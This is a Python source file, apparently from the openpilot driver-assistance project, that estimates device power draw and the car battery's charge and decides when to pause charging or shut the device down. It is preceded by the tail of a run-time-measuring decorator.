    """Decorator measuring the wall-clock run time of *method*.

    If the call carries a 'log_time' dict keyword argument, the elapsed
    time in milliseconds is stored there under the 'log_name' keyword
    (default: the upper-cased method name); otherwise it is printed.
    """
    import time
    import functools

    @functools.wraps(method)  # preserve __name__/__doc__ of the wrapped method
    def timed(*args, **kw):
        ts = time.time()
        result = method(*args, **kw)
        te = time.time()
        if 'log_time' in kw:
            name = kw.get('log_name', method.__name__.upper())
            kw['log_time'][name] = int((te - ts) * 1000)
        else:
            print('%r %2.2f ms' % (method.__name__, (te - ts) * 1000))
        return result
    return timed
power_monitoring.py | import random
import threading
import time
from statistics import mean
from typing import Optional
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
from selfdrive.statsd import statlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
  """Estimates device power draw and tracks the car battery's modeled charge.

  Integrates power usage over time while offroad, and models the car battery
  as a simple uWh capacity that charges at CAR_CHARGING_RATE_W while the
  ignition is on.  Used to decide when to stop charging the device
  (should_disable_charging) and when to shut it down (should_shutdown).
  """

  def __init__(self):
    self.params = Params()
    self.last_measurement_time = None  # Used for integration delta
    self.last_save_time = 0  # Used for saving current value in a param
    self.power_used_uWh = 0  # Integrated power usage in uWh since going into offroad
    self.next_pulsed_measurement_time = None
    self.car_voltage_mV = 12e3  # Low-passed version of peripheralState voltage
    self.car_voltage_instant_mV = 12e3  # Last value of peripheralState voltage
    self.integration_lock = threading.Lock()

    # Restore persisted capacity estimate; defaults to 0 when unset.
    car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
    if car_battery_capacity_uWh is None:
      car_battery_capacity_uWh = 0

    # Reset capacity if it's low
    self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))

  # Calculation tick
  def calculate(self, peripheralState, ignition):
    """Run one monitoring step: update the voltage filter, persist the
    battery estimate, and integrate charge/discharge since the last call.

    peripheralState: panda peripheral state message (may be None).
    ignition: True while the car ignition is on.
    """
    try:
      now = sec_since_boot()

      # If peripheralState is None, we're probably not in a car, so we don't care
      if peripheralState is None or peripheralState.pandaType == log.PandaState.PandaType.unknown:
        with self.integration_lock:
          self.last_measurement_time = None
          self.next_pulsed_measurement_time = None
          self.power_used_uWh = 0
        return

      # Low-pass battery voltage
      self.car_voltage_instant_mV = peripheralState.voltage
      self.car_voltage_mV = ((peripheralState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
      statlog.gauge("car_voltage", self.car_voltage_mV / 1e3)

      # Cap the car battery power and save it in a param every 10-ish seconds
      self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
      self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
      if now - self.last_save_time >= 10:
        put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
        self.last_save_time = now

      # First measurement, set integration time
      with self.integration_lock:
        if self.last_measurement_time is None:
          self.last_measurement_time = now
          return

      if ignition:
        # If there is ignition, we integrate the charging rate of the car
        with self.integration_lock:
          self.power_used_uWh = 0
          integration_time_h = (now - self.last_measurement_time) / 3600
          if integration_time_h < 0:
            raise ValueError(f"Negative integration time: {integration_time_h}h")
          self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
          self.last_measurement_time = now
      else:
        # No ignition, we integrate the offroad power used by the device
        is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
        # Get current power draw somehow
        current_power = HARDWARE.get_current_power_draw()  # pylint: disable=assignment-from-none
        if current_power is not None:
          pass
        elif HARDWARE.get_battery_status() == 'Discharging':
          # If the battery is discharging, we can use this measurement
          # On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
          current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
        elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
          # TODO: Figure out why this is off by a factor of 3/4???
          FUDGE_FACTOR = 1.33

          # Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
          def perform_pulse_measurement(now):
            try:
              HARDWARE.set_battery_charging(False)
              time.sleep(5)

              # Measure for a few sec to get a good average
              voltages = []
              currents = []
              for _ in range(6):
                voltages.append(HARDWARE.get_battery_voltage())
                currents.append(HARDWARE.get_battery_current())
                time.sleep(1)
              current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))

              self._perform_integration(now, current_power * FUDGE_FACTOR)

              # Enable charging again
              HARDWARE.set_battery_charging(True)
            except Exception:
              cloudlog.exception("Pulsed power measurement failed")

          # Start pulsed measurement and return
          threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
          self.next_pulsed_measurement_time = None
          return
        elif self.next_pulsed_measurement_time is None and not is_uno:
          # On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
          # Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
          # We shouldn't do this very often, so make sure it has been some long-ish random time interval
          self.next_pulsed_measurement_time = now + random.randint(120, 180)
          return
        else:
          # Do nothing
          return

        # Do the integration
        self._perform_integration(now, current_power)
    except Exception:
      cloudlog.exception("Power monitoring calculation failed")

  def _perform_integration(self, t: float, current_power: float) -> None:
    """Fold *current_power* (W) since the last measurement into the usage
    and car-battery-capacity accumulators.  Guarded by integration_lock."""
    with self.integration_lock:
      try:
        if self.last_measurement_time:
          integration_time_h = (t - self.last_measurement_time) / 3600
          power_used = (current_power * 1000000) * integration_time_h
          if power_used < 0:
            raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
          self.power_used_uWh += power_used
          self.car_battery_capacity_uWh -= power_used
          self.last_measurement_time = t
      except Exception:
        cloudlog.exception("Integration failed")

  # Get the power usage
  def get_power_used(self) -> int:
    """Return integrated offroad power usage in uWh."""
    return int(self.power_used_uWh)

  def get_car_battery_capacity(self) -> int:
    """Return the current car battery capacity estimate in uWh."""
    return int(self.car_battery_capacity_uWh)

  # See if we need to disable charging
  def should_disable_charging(self, ignition: bool, in_car: bool, offroad_timestamp: Optional[float]) -> bool:
    """Return True when device charging should be paused: too long offroad,
    low (filtered) car battery voltage, or depleted modeled capacity —
    but only while the ignition is off, power-down is not disabled, and
    the device is in a car.  ForcePowerDown overrides everything."""
    if offroad_timestamp is None:
      return False

    now = sec_since_boot()
    disable_charging = False
    disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
    # Instant-voltage floor avoids triggering on momentary power loss.
    disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
    disable_charging |= (self.car_battery_capacity_uWh <= 0)
    disable_charging &= not ignition
    disable_charging &= (not self.params.get_bool("DisablePowerDown"))
    disable_charging &= in_car
    disable_charging |= self.params.get_bool("ForcePowerDown")
    return disable_charging

  # See if we need to shutdown
  def should_shutdown(self, peripheralState, ignition, in_car, offroad_timestamp, started_seen):
    """Return True when the device should power off: charging already
    disabled (and panda no longer charging us), or the device battery is
    nearly empty and discharging — gated by a minimum on-time unless a
    drive has been seen."""
    if offroad_timestamp is None:
      return False

    now = sec_since_boot()
    panda_charging = (peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client)
    BATT_PERC_OFF = 10

    should_shutdown = False
    # Wait until we have shut down charging before powering down
    should_shutdown |= (not panda_charging and self.should_disable_charging(ignition, in_car, offroad_timestamp))
    should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
    should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
    return should_shutdown
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.